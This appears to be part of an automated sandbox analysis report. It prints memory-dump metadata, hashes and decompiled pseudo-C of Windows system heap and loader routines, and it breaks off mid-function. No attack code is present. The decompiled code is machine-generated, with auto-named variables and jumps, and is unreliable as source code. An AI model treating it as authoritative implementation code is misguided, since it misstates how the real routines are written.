                                                                                                                                                    0x0097fc1a
                                                                                                                                                    0x0097fc20
                                                                                                                                                    0x0097fc27
                                                                                                                                                    0x0097fc2d
                                                                                                                                                    0x0097fc2d
                                                                                                                                                    0x0097fc27
                                                                                                                                                    0x0097fc1a
                                                                                                                                                    0x0097fbf4
                                                                                                                                                    0x0097fbe8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0097fbdc
                                                                                                                                                    0x00941d17
                                                                                                                                                    0x00941d1e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00941d30
                                                                                                                                                    0x00941d32
                                                                                                                                                    0x00941d34
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0097fc38
                                                                                                                                                    0x0097fc3e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0097fc44
                                                                                                                                                    0x00953566
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00953566
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0097fc3e
                                                                                                                                                    0x00941cf0
                                                                                                                                                    0x00941d8d
                                                                                                                                                    0x00941d90
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00941da1
                                                                                                                                                    0x00941da6
                                                                                                                                                    0x00941da8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00941db1
                                                                                                                                                    0x00941db4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00941db4
                                                                                                                                                    0x0093e772
                                                                                                                                                    0x0093e777
                                                                                                                                                    0x0093e779
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0093e779
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0093ed19
                                                                                                                                                    0x0093e747
                                                                                                                                                    0x0093e749
                                                                                                                                                    0x0093e74f
                                                                                                                                                    0x0093e755
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0093e755

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 0&($8&($DLL name: %wZ DLL path: %wZ$LdrpFindOrMapDll$MZER$Status: 0x%08lx$d:\w7rtm\minkernel\ntdll\ldrfind.c$*(
                                                                                                                                                    • API String ID: 0-332062512
                                                                                                                                                    • Opcode ID: 2803da1ca647f202039cda85e6553aaabcc32cfee25f2fd9fe382a706495b854
                                                                                                                                                    • Instruction ID: 85170b96c5339c3d7ef38a739faa4ac2bdb0198bc5baab6d1690619a5d0ef1fd
                                                                                                                                                    • Opcode Fuzzy Hash: 2803da1ca647f202039cda85e6553aaabcc32cfee25f2fd9fe382a706495b854
                                                                                                                                                    • Instruction Fuzzy Hash: EB328C72900208AFDF21DFA4C885FEEBBB9BF88300F148426F959A72A1D7749945DF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009D1238, Relevance: 10.3, Strings: 8, Instructions: 324COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 65%
                                                                                                                                                    			E009D1238(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t123;
				signed int _t124;
				void* _t130;
				intOrPtr _t132;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				intOrPtr _t151;
				intOrPtr _t163;
				signed int _t173;
				signed int _t174;
				signed int _t178;
				short _t184;
				signed int _t193;
				signed int _t194;
				intOrPtr _t197;
				intOrPtr _t219;
				short* _t233;
				void* _t246;
				intOrPtr _t248;
				signed int _t251;
				signed int _t253;
				signed int _t254;
				void* _t255;
				void* _t256;

				_t246 = __edx;
				_push(0x18);
				_push(0x92d158);
				_t123 = L0092DF5C(__ebx, __edi, __esi);
				_t248 =  *((intOrPtr*)(_t255 + 8));
				 *((intOrPtr*)(_t255 + 8)) = _t248;
				 *((char*)(_t255 - 0x19)) = 0;
				 *(_t255 - 0x24) = 0;
				if(( *(_t248 + 0x44) & 0x01000000) == 0) {
					 *(_t255 - 4) = 0;
					 *(_t255 - 4) = 1;
					_t232 = "RtlReAllocateHeap";
					_t124 = E009385CA(_t248, "RtlReAllocateHeap");
					__eflags = _t124;
					if(_t124 != 0) {
						 *(_t255 + 0xc) =  *(_t255 + 0xc) |  *(_t248 + 0x44) | 0x10000100;
						_t251 =  *(_t255 + 0x14);
						__eflags = _t251;
						if(_t251 == 0) {
							_t235 = 1;
							__eflags = 1;
						} else {
							_t235 = _t251;
						}
						_t130 = ( *((intOrPtr*)(_t248 + 0x98)) + _t235 &  *(_t248 + 0x9c)) + 8;
						__eflags = _t130 - _t251;
						if(_t130 < _t251) {
							L66:
							_t132 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t132 + 0xc);
							if( *(_t132 + 0xc) == 0) {
								_push("HEAP: ");
								E0097373B();
							} else {
								E0097373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							_push( *((intOrPtr*)(_t248 + 0x7c)));
							E0097373B("Invalid allocation size - %x (exceeded %x)\n", _t251);
							E009D06F9(0);
							_t117 = _t255 - 0x24;
							 *_t117 =  *(_t255 - 0x24) & 0x00000000;
							__eflags =  *_t117;
							goto L71;
						} else {
							__eflags = _t130 -  *((intOrPtr*)(_t248 + 0x7c));
							if(_t130 >  *((intOrPtr*)(_t248 + 0x7c))) {
								goto L66;
							}
							__eflags =  *(_t255 + 0xc) & 0x00000001;
							if(__eflags == 0) {
								E009222D0(__eflags,  *((intOrPtr*)(_t248 + 0xcc)));
								 *((char*)(_t255 - 0x19)) = 1;
								_t26 = _t255 + 0xc;
								 *_t26 =  *(_t255 + 0xc) | 0x00000001;
								__eflags =  *_t26;
							}
							E009D098E(_t235, _t246, _t248, 0);
							_t253 =  *((intOrPtr*)(_t255 + 0x10)) + 0xfffffff8;
							__eflags =  *((char*)(_t253 + 7)) - 5;
							if( *((char*)(_t253 + 7)) == 5) {
								_t253 = _t253 - (( *(_t253 + 6) & 0x000000ff) << 3);
								__eflags = _t253;
							}
							_t145 = L00960ED7(_t235, _t248, _t253, _t232);
							__eflags = _t145;
							if(_t145 == 0) {
								L52:
								_t146 =  *(_t255 - 0x24);
								__eflags = _t146;
								if(_t146 == 0) {
									L71:
									_t119 = _t255 - 4;
									 *_t119 =  *(_t255 - 4) & 0x00000000;
									__eflags =  *_t119;
									 *(_t255 - 4) = 0xfffffffe;
									E009D16C3();
									_t123 =  *(_t255 - 0x24);
									goto L72;
								}
								__eflags = _t146 -  *0xa07928; // 0x0
								if(__eflags != 0) {
									_t147 = E00938131();
									__eflags = _t147 & 0x00000800;
									if((_t147 & 0x00000800) == 0) {
										goto L71;
									}
									__eflags =  *(_t255 - 0x20) -  *0xa0792c; // 0x0
									if(__eflags != 0) {
										goto L71;
									}
									__eflags =  *((intOrPtr*)(_t248 + 0x80)) -  *0xa0792e; // 0x0
									if(__eflags != 0) {
										goto L71;
									}
									_t151 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									__eflags =  *(_t151 + 0xc);
									if( *(_t151 + 0xc) == 0) {
										_push("HEAP: ");
										E0097373B();
									} else {
										E0097373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
									}
									_push(E009BF719(_t248,  *(_t255 - 0x20)));
									_push( *(_t255 + 0x14));
									E0097373B("Just reallocated block at %p to 0x%x bytes with tag %ws\n",  *(_t255 - 0x24));
									L58:
									E009D06F9(0);
									goto L71;
								}
								_t163 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t163 + 0xc);
								if( *(_t163 + 0xc) == 0) {
									_push("HEAP: ");
									E0097373B();
								} else {
									E0097373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t255 + 0x14));
								E0097373B("Just reallocated block at %p to %x bytes\n",  *0xa07928);
								goto L58;
							} else {
								__eflags =  *((intOrPtr*)(_t255 + 0x10)) -  *0xa07928; // 0x0
								if(__eflags != 0) {
									_t173 = E00938131();
									__eflags = _t173 & 0x00000800;
									if((_t173 & 0x00000800) == 0) {
										L37:
										_t174 = E0093C7BC(_t248,  *(_t255 + 0xc),  *((intOrPtr*)(_t255 + 0x10)),  *(_t255 + 0x14));
										 *(_t255 - 0x24) = _t174;
										__eflags = _t174;
										if(_t174 != 0) {
											_t70 = _t174 - 8; // -8
											_t254 = _t70;
											__eflags =  *((char*)(_t254 + 7)) - 5;
											if( *((char*)(_t254 + 7)) == 5) {
												_t254 = _t254 - (( *(_t254 + 6) & 0x000000ff) << 3);
												__eflags = _t254;
											}
											__eflags =  *(_t248 + 0x4c);
											if( *(_t248 + 0x4c) != 0) {
												 *_t254 =  *_t254 ^  *(_t248 + 0x50);
												__eflags =  *(_t254 + 3) - ( *(_t254 + 2) ^  *(_t254 + 1) ^  *_t254);
												if(__eflags != 0) {
													_push(0);
													_push(_t254);
													_push(_t248);
													E009CF8EE(_t232, _t248, _t254, __eflags);
												}
											}
											__eflags =  *(_t254 + 2) & 0x00000002;
											if(( *(_t254 + 2) & 0x00000002) == 0) {
												_t178 =  *(_t254 + 3) & 0xff;
											} else {
												_t233 = E00952568(_t254);
												__eflags =  *(_t248 + 0x40) & 0x08000000;
												if(( *(_t248 + 0x40) & 0x08000000) == 0) {
													_t184 = 0;
													__eflags = 0;
												} else {
													_t184 = L009C9AF6();
												}
												 *_t233 = _t184;
												_t178 =  *(_t233 + 2) & 0x0000ffff;
											}
											 *(_t255 - 0x20) = _t178;
											__eflags =  *(_t248 + 0x4c);
											if( *(_t248 + 0x4c) != 0) {
												_t235 =  *(_t254 + 2) & 0x000000ff;
												 *(_t254 + 3) =  *(_t254 + 1) & 0x000000ff ^  *_t254 & 0x000000ff ^  *(_t254 + 2) & 0x000000ff;
												 *_t254 =  *_t254 ^  *(_t248 + 0x50);
												__eflags =  *_t254;
											}
										}
										L009CFB7A(_t235, _t246, _t248, 1);
										E009D098E(_t235, _t246, _t248, 0);
										goto L52;
									}
									_t232 = 0;
									__eflags =  *0xa0792c - _t232; // 0x0
									if(__eflags == 0) {
										goto L37;
									}
									__eflags =  *(_t248 + 0x4c);
									if( *(_t248 + 0x4c) != 0) {
										 *_t253 =  *_t253 ^  *(_t248 + 0x50);
										__eflags =  *(_t253 + 3) - ( *(_t253 + 2) ^  *(_t253 + 1) ^  *_t253);
										if(__eflags != 0) {
											_push(0);
											_push(_t253);
											_push(_t248);
											E009CF8EE(0, _t248, _t253, __eflags);
										}
									}
									__eflags =  *(_t253 + 2) & 0x00000002;
									if(( *(_t253 + 2) & 0x00000002) == 0) {
										_t193 =  *(_t253 + 3) & 0xff;
									} else {
										_t193 =  *(E00952568(_t253) + 2) & 0x0000ffff;
									}
									 *(_t255 - 0x20) = _t193;
									__eflags =  *(_t248 + 0x4c) - _t232;
									if( *(_t248 + 0x4c) != _t232) {
										_t235 =  *(_t253 + 2) & 0x000000ff;
										 *(_t253 + 3) =  *(_t253 + 1) & 0x000000ff ^  *_t253 & 0x000000ff ^  *(_t253 + 2) & 0x000000ff;
										 *_t253 =  *_t253 ^  *(_t248 + 0x50);
										__eflags =  *_t253;
									}
									_t194 =  *(_t255 - 0x20);
									__eflags = _t194 - _t232;
									if(_t194 != _t232) {
										__eflags = _t194 -  *0xa0792c; // 0x0
										if(__eflags != 0) {
											goto L37;
										}
										__eflags =  *((intOrPtr*)(_t248 + 0x80)) -  *0xa0792e; // 0x0
										if(__eflags != 0) {
											goto L37;
										}
										_t197 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
										__eflags =  *((intOrPtr*)(_t197 + 0xc)) - _t232;
										if( *((intOrPtr*)(_t197 + 0xc)) == _t232) {
											_push("HEAP: ");
											E0097373B();
										} else {
											E0097373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
										}
										_pop(_t235);
										_push(E009BF719(_t248,  *(_t255 - 0x20)));
										_push( *(_t255 + 0x14));
										E0097373B("About to rellocate block at %p to 0x%x bytes with tag %ws\n",  *((intOrPtr*)(_t255 + 0x10)));
										_t256 = _t256 + 0x10;
										_push(_t232);
										L36:
										E009D06F9();
									}
									goto L37;
								}
								_t219 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t219 + 0xc);
								if( *(_t219 + 0xc) == 0) {
									_push("HEAP: ");
									E0097373B();
								} else {
									E0097373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_pop(_t235);
								_push( *(_t255 + 0x14));
								E0097373B("About to reallocate block at %p to %x bytes\n",  *0xa07928);
								_t256 = _t256 + 0xc;
								_push(0);
								goto L36;
							}
						}
					}
					 *(_t255 - 0x24) = 0;
					goto L71;
				} else {
					_push( *(_t255 + 0x14));
					_push( *((intOrPtr*)(_t255 + 0x10)));
					_push( *(_t255 + 0xc));
					_push(_t248);
					E009CE765();
					L72:
					return L0092DFA1(_t123);
				}
			}




























                                                                                                                                                    0x009d1238
                                                                                                                                                    0x009d1238
                                                                                                                                                    0x009d123a
                                                                                                                                                    0x009d123f
                                                                                                                                                    0x009d1244
                                                                                                                                                    0x009d1247
                                                                                                                                                    0x009d124a
                                                                                                                                                    0x009d1250
                                                                                                                                                    0x009d125a
                                                                                                                                                    0x009d1270
                                                                                                                                                    0x009d1273
                                                                                                                                                    0x009d127a
                                                                                                                                                    0x009d1281
                                                                                                                                                    0x009d1286
                                                                                                                                                    0x009d1288
                                                                                                                                                    0x009d129a
                                                                                                                                                    0x009d129d
                                                                                                                                                    0x009d12a0
                                                                                                                                                    0x009d12a2
                                                                                                                                                    0x009d12aa
                                                                                                                                                    0x009d12aa
                                                                                                                                                    0x009d12a4
                                                                                                                                                    0x009d12a4
                                                                                                                                                    0x009d12a4
                                                                                                                                                    0x009d12b9
                                                                                                                                                    0x009d12bc
                                                                                                                                                    0x009d12be
                                                                                                                                                    0x009d1616
                                                                                                                                                    0x009d161c
                                                                                                                                                    0x009d161f
                                                                                                                                                    0x009d1623
                                                                                                                                                    0x009d1645
                                                                                                                                                    0x009d164a
                                                                                                                                                    0x009d1625
                                                                                                                                                    0x009d163d
                                                                                                                                                    0x009d1642
                                                                                                                                                    0x009d1650
                                                                                                                                                    0x009d1659
                                                                                                                                                    0x009d1663
                                                                                                                                                    0x009d169f
                                                                                                                                                    0x009d169f
                                                                                                                                                    0x009d169f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d12c4
                                                                                                                                                    0x009d12c4
                                                                                                                                                    0x009d12c7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d12cd
                                                                                                                                                    0x009d12d1
                                                                                                                                                    0x009d12d9
                                                                                                                                                    0x009d12de
                                                                                                                                                    0x009d12e2
                                                                                                                                                    0x009d12e2
                                                                                                                                                    0x009d12e2
                                                                                                                                                    0x009d12e2
                                                                                                                                                    0x009d12e9
                                                                                                                                                    0x009d12f1
                                                                                                                                                    0x009d12f4
                                                                                                                                                    0x009d12f8
                                                                                                                                                    0x009d1301
                                                                                                                                                    0x009d1301
                                                                                                                                                    0x009d1301
                                                                                                                                                    0x009d1306
                                                                                                                                                    0x009d130b
                                                                                                                                                    0x009d130d
                                                                                                                                                    0x009d1516
                                                                                                                                                    0x009d1516
                                                                                                                                                    0x009d1519
                                                                                                                                                    0x009d151b
                                                                                                                                                    0x009d16a3
                                                                                                                                                    0x009d16a3
                                                                                                                                                    0x009d16a3
                                                                                                                                                    0x009d16a3
                                                                                                                                                    0x009d16a7
                                                                                                                                                    0x009d16ae
                                                                                                                                                    0x009d16b3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d16b3
                                                                                                                                                    0x009d1521
                                                                                                                                                    0x009d1527
                                                                                                                                                    0x009d1585
                                                                                                                                                    0x009d158a
                                                                                                                                                    0x009d158f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d1599
                                                                                                                                                    0x009d15a0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d15ad
                                                                                                                                                    0x009d15b4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d15c0
                                                                                                                                                    0x009d15c3
                                                                                                                                                    0x009d15c7
                                                                                                                                                    0x009d15e9
                                                                                                                                                    0x009d15ee
                                                                                                                                                    0x009d15c9
                                                                                                                                                    0x009d15e1
                                                                                                                                                    0x009d15e6
                                                                                                                                                    0x009d15fd
                                                                                                                                                    0x009d15fe
                                                                                                                                                    0x009d1609
                                                                                                                                                    0x009d1579
                                                                                                                                                    0x009d157b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d157b
                                                                                                                                                    0x009d152f
                                                                                                                                                    0x009d1532
                                                                                                                                                    0x009d1536
                                                                                                                                                    0x009d1558
                                                                                                                                                    0x009d155d
                                                                                                                                                    0x009d1538
                                                                                                                                                    0x009d1550
                                                                                                                                                    0x009d1555
                                                                                                                                                    0x009d1563
                                                                                                                                                    0x009d1571
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d1313
                                                                                                                                                    0x009d1316
                                                                                                                                                    0x009d131c
                                                                                                                                                    0x009d1375
                                                                                                                                                    0x009d137a
                                                                                                                                                    0x009d137f
                                                                                                                                                    0x009d1468
                                                                                                                                                    0x009d1472
                                                                                                                                                    0x009d1477
                                                                                                                                                    0x009d147a
                                                                                                                                                    0x009d147c
                                                                                                                                                    0x009d1482
                                                                                                                                                    0x009d1482
                                                                                                                                                    0x009d1485
                                                                                                                                                    0x009d1489
                                                                                                                                                    0x009d1492
                                                                                                                                                    0x009d1492
                                                                                                                                                    0x009d1492
                                                                                                                                                    0x009d1494
                                                                                                                                                    0x009d1498
                                                                                                                                                    0x009d149d
                                                                                                                                                    0x009d14a7
                                                                                                                                                    0x009d14aa
                                                                                                                                                    0x009d14ac
                                                                                                                                                    0x009d14ae
                                                                                                                                                    0x009d14af
                                                                                                                                                    0x009d14b0
                                                                                                                                                    0x009d14b0
                                                                                                                                                    0x009d14aa
                                                                                                                                                    0x009d14b5
                                                                                                                                                    0x009d14b9
                                                                                                                                                    0x009d14e3
                                                                                                                                                    0x009d14bb
                                                                                                                                                    0x009d14c1
                                                                                                                                                    0x009d14c3
                                                                                                                                                    0x009d14ca
                                                                                                                                                    0x009d14d3
                                                                                                                                                    0x009d14d3
                                                                                                                                                    0x009d14cc
                                                                                                                                                    0x009d14cc
                                                                                                                                                    0x009d14cc
                                                                                                                                                    0x009d14d5
                                                                                                                                                    0x009d14d8
                                                                                                                                                    0x009d14d8
                                                                                                                                                    0x009d14e6
                                                                                                                                                    0x009d14e9
                                                                                                                                                    0x009d14ed
                                                                                                                                                    0x009d14f8
                                                                                                                                                    0x009d14fe
                                                                                                                                                    0x009d1504
                                                                                                                                                    0x009d1504
                                                                                                                                                    0x009d1504
                                                                                                                                                    0x009d14ed
                                                                                                                                                    0x009d1509
                                                                                                                                                    0x009d1511
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d1511
                                                                                                                                                    0x009d1385
                                                                                                                                                    0x009d1387
                                                                                                                                                    0x009d138d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d1393
                                                                                                                                                    0x009d1396
                                                                                                                                                    0x009d139b
                                                                                                                                                    0x009d13a5
                                                                                                                                                    0x009d13a8
                                                                                                                                                    0x009d13aa
                                                                                                                                                    0x009d13ab
                                                                                                                                                    0x009d13ac
                                                                                                                                                    0x009d13ad
                                                                                                                                                    0x009d13ad
                                                                                                                                                    0x009d13a8
                                                                                                                                                    0x009d13b2
                                                                                                                                                    0x009d13b6
                                                                                                                                                    0x009d13c9
                                                                                                                                                    0x009d13b8
                                                                                                                                                    0x009d13be
                                                                                                                                                    0x009d13be
                                                                                                                                                    0x009d13cc
                                                                                                                                                    0x009d13cf
                                                                                                                                                    0x009d13d2
                                                                                                                                                    0x009d13dd
                                                                                                                                                    0x009d13e3
                                                                                                                                                    0x009d13e9
                                                                                                                                                    0x009d13e9
                                                                                                                                                    0x009d13e9
                                                                                                                                                    0x009d13eb
                                                                                                                                                    0x009d13ee
                                                                                                                                                    0x009d13f1
                                                                                                                                                    0x009d13f3
                                                                                                                                                    0x009d13fa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d1403
                                                                                                                                                    0x009d140a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d1412
                                                                                                                                                    0x009d1415
                                                                                                                                                    0x009d1418
                                                                                                                                                    0x009d143a
                                                                                                                                                    0x009d143f
                                                                                                                                                    0x009d141a
                                                                                                                                                    0x009d1432
                                                                                                                                                    0x009d1437
                                                                                                                                                    0x009d1444
                                                                                                                                                    0x009d144e
                                                                                                                                                    0x009d144f
                                                                                                                                                    0x009d145a
                                                                                                                                                    0x009d145f
                                                                                                                                                    0x009d1462
                                                                                                                                                    0x009d1463
                                                                                                                                                    0x009d1463
                                                                                                                                                    0x009d1463
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d13f1
                                                                                                                                                    0x009d1324
                                                                                                                                                    0x009d1327
                                                                                                                                                    0x009d132b
                                                                                                                                                    0x009d134d
                                                                                                                                                    0x009d1352
                                                                                                                                                    0x009d132d
                                                                                                                                                    0x009d1345
                                                                                                                                                    0x009d134a
                                                                                                                                                    0x009d1357
                                                                                                                                                    0x009d1358
                                                                                                                                                    0x009d1366
                                                                                                                                                    0x009d136b
                                                                                                                                                    0x009d136e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d136e
                                                                                                                                                    0x009d130d
                                                                                                                                                    0x009d12be
                                                                                                                                                    0x009d128a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009d125c
                                                                                                                                                    0x009d125c
                                                                                                                                                    0x009d125f
                                                                                                                                                    0x009d1262
                                                                                                                                                    0x009d1265
                                                                                                                                                    0x009d1266
                                                                                                                                                    0x009d16b6
                                                                                                                                                    0x009d16bb
                                                                                                                                                    0x009d16bb

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: About to reallocate block at %p to %x bytes$About to rellocate block at %p to 0x%x bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %x (exceeded %x)$Just reallocated block at %p to %x bytes$Just reallocated block at %p to 0x%x bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                    • API String ID: 0-3744532478
                                                                                                                                                    • Opcode ID: bef90e7563a27bbd4ce0a3140cee06edde0259af606b6204530e31c143eedc1a
                                                                                                                                                    • Instruction ID: 877b2bc7b9e8619df8f3e8547849c62e79545e2650a2e41be501bdd73b6102f0
                                                                                                                                                    • Opcode Fuzzy Hash: bef90e7563a27bbd4ce0a3140cee06edde0259af606b6204530e31c143eedc1a
                                                                                                                                                    • Instruction Fuzzy Hash: E1C10172540291AFDB25EF64C846FAABBF4AF48714F04C04AF8959B692C738ED41DB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0092F3CF, Relevance: 9.2, Strings: 7, Instructions: 466COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                    			E0092F3CF(signed short* __ecx, signed short __edx, signed short* __esi, char _a4, signed int _a8) {
				signed int _v8;
				short _v12;
				short _v24;
				intOrPtr _v28;
				short* _v32;
				short* _v36;
				short* _v40;
				short _v42;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed short _v56;
				signed int _v60;
				signed short _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed char* _v84;
				signed int _v88;
				char _v92;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				char _v156;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t186;
				short _t194;
				short* _t196;
				intOrPtr _t205;
				signed char* _t206;
				signed char _t207;
				signed int _t209;
				signed short* _t210;
				void* _t214;
				signed int _t215;
				signed int _t219;
				void* _t221;
				signed int _t223;
				signed short _t227;
				signed char _t232;
				void* _t237;
				signed int _t238;
				signed short _t242;
				signed int _t245;
				signed int _t254;
				void* _t255;
				signed int _t256;
				signed short _t260;
				void* _t266;
				signed int _t267;
				signed int _t271;
				signed short* _t282;
				signed int _t283;
				signed int _t287;
				signed int _t288;
				signed int _t291;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int _t299;
				signed int* _t300;
				signed short _t304;
				char* _t337;
				signed int* _t342;
				signed int _t345;
				signed short* _t347;
				signed int _t348;
				void* _t349;
				void* _t350;

				_t347 = __esi;
				_t186 =  *0xa02088; // 0x7745a8fa
				_v8 = _t186 ^ _t348;
				_v88 = _a8;
				_t345 = __edx;
				_t282 = __ecx;
				_v56 = __edx;
				_v156 = 0x40;
				L0092DFC0( &_v152, 0, 0x3c);
				_t350 = _t349 + 0xc;
				_v68 =  *_t282;
				_v64 = _t282[2];
				_t337 =  &_v12;
				_v32 = _t337;
				_v40 = _t337;
				_v36 =  &_v12;
				_t194 = 2;
				_v12 = 0;
				_v44 = 0;
				_v42 = _t194;
				_t341 =  &_v68;
				_v72 = 0;
				_v60 = 0;
				_v28 = _t194;
				_v24 = _t194;
				_t283 = L0092ED18(3, 0, _t194,  &_v68,  &_v156);
				if(_t283 >= 0) {
					__eflags = _a4;
					if(_a4 != 0) {
						L44:
						_t283 = 0;
						L2:
						_t291 = _v36;
						_t196 = _v32;
						if(_t291 != 0) {
							if(_t291 != _t196) {
								_v88 = _t291;
								E0092E1C6( &_v92);
								_t196 = _v32;
							}
							_v36 = _t196;
							_v28 = _v24;
						}
						_v40 = _t196;
						if(_t196 != 0) {
							 *_t196 = 0;
						}
						_v44 = 0;
						_t198 = _v24;
						_v42 = _v24;
						if(_v72 != 0) {
							L0093B90D(_t198, _v72);
						}
						return E0092E1B4(_t283, _t283, _v8 ^ _t348, _t341, _t345, _t347);
					}
					__eflags = _v144 - 0x14;
					_v72 = _v124;
					if(_v144 < 0x14) {
						L48:
						_t283 = 0xc0150003;
						goto L2;
					}
					__eflags = _v152 - 1;
					if(_v152 != 1) {
						goto L48;
					}
					_t205 = _v148;
					_t296 = _t205 + 0x10;
					_v52 = _t296;
					_t297 =  *_t296;
					__eflags = _t297 - _v128;
					if(_t297 > _v128) {
						goto L48;
					}
					_t342 = _t205 + 0xc;
					_v76 = _t342;
					_t341 =  *_t342;
					__eflags = _t341 - 0x1fffffff;
					if(_t341 > 0x1fffffff) {
						goto L48;
					}
					_t341 = _t341 << 3;
					__eflags = _t297 - (_t283 | 0xffffffff) - _t341;
					if(_t297 > (_t283 | 0xffffffff) - _t341) {
						goto L48;
					}
					_t341 = _t341 + _t297;
					__eflags = _t341 - _v128;
					if(_t341 > _v128) {
						goto L48;
					}
					_t206 = _t205 + 4;
					_v84 = _t206;
					_t207 =  *_t206;
					__eflags = _t207 & 0x00000002;
					if((_t207 & 0x00000002) == 0) {
						L22:
						_t287 =  *_v52 + _v132;
						_t209 = 0;
						 *_t345 = 0;
						_t299 =  *_v76;
						_v52 = _t299;
						__eflags = _t299;
						while(1) {
							_v48 = _t209;
							if(__eflags == 0) {
								break;
							}
							_t300 = _t287 + 4 + _t209 * 8;
							_t341 =  *_t300;
							_v76 = _t341;
